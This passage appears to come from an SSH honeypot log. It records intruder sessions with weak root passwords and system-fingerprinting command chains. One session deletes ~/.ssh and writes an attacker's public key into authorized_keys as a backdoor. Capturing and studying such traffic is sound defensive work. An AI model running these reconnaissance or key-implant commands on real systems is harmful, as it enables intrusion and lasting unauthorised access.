2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "COMMANDS RUN",
    "RECONNAISSANCE",
    "SUCCESSFUL LOGIN"
  ]
}
117.200.93.93
2026-06-30 01:04:49.154987 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: ccebbf3ee63d
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 1.8s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "ccebbf3ee63d",
  "src_ip": "117.200.93.93",
  "start_time": "2026-06-30T01:04:49.154987Z",
  "end_time": "2026-06-30T01:04:50.964142Z",
  "duration": "1.8",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
117.200.93.93
2026-06-30 01:04:46.016411 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: 2f038ba3ee92
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 2.8s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "2f038ba3ee92",
  "src_ip": "117.200.93.93",
  "start_time": "2026-06-30T01:04:46.016411Z",
  "end_time": "2026-06-30T01:04:48.863858Z",
  "duration": "2.8",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
117.200.93.93
2026-06-30 01:04:42.298031 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / Q!W@E#R$q1w2e3r4

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 56934711768e
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 8.7s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "56934711768e",
  "src_ip": "117.200.93.93",
  "start_time": "2026-06-30T01:04:42.298031Z",
  "end_time": "2026-06-30T01:04:50.961113Z",
  "duration": "8.7",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "Q!W@E#R$q1w2e3r4"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
180.76.51.13
2026-06-30 01:03:56.260716 UTC
SCORE: 10

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: f099d962eb9b
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2m 0s
{
  "id": "f099d962eb9b",
  "src_ip": "180.76.51.13",
  "start_time": "2026-06-30T01:03:56.260716Z",
  "end_time": "2026-06-30T01:05:56.274922Z",
  "duration": "120.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 10,
  "tags": []
}
195.178.110.228
2026-06-30 01:03:10.684999 UTC
COMMANDS RUN RECONNAISSANCE SUCCESSFUL LOGIN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 123123

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
[obs-node]:~$ uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null
Command not found: /usr/bin/uname -s -v -n -m
[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ ( [ -f /proc/version ]
[obs-node]:~$ [ -f /proc/version ]
[obs-node]:~$ head -1 /proc/version | cut -d -f1
[obs-node]:~$ [ -f /etc/os-release ]
Record ID: 188760396a7b
Client Version: SSH-2.0-Go
Engagement Duration: 2.9s
HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5
{
  "id": "188760396a7b",
  "src_ip": "195.178.110.228",
  "start_time": "2026-06-30T01:03:10.684999Z",
  "end_time": "2026-06-30T01:03:13.594190Z",
  "duration": "2.9",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "123123"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "COMMANDS RUN",
    "RECONNAISSANCE",
    "SUCCESSFUL LOGIN"
  ]
}
195.178.110.228
2026-06-30 01:01:02.281281 UTC
COMMANDS RUN RECONNAISSANCE SUCCESSFUL LOGIN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 111111

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
[obs-node]:~$ uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null
Command not found: /usr/bin/uname -s -v -n -m
[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ ( [ -f /proc/version ]
[obs-node]:~$ [ -f /proc/version ]
[obs-node]:~$ head -1 /proc/version | cut -d -f1
[obs-node]:~$ [ -f /etc/os-release ]
Record ID: 066a704a621e
Client Version: SSH-2.0-Go
Engagement Duration: 3.3s
HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5
{
  "id": "066a704a621e",
  "src_ip": "195.178.110.228",
  "start_time": "2026-06-30T01:01:02.281281Z",
  "end_time": "2026-06-30T01:01:05.593966Z",
  "duration": "3.3",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "111111"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
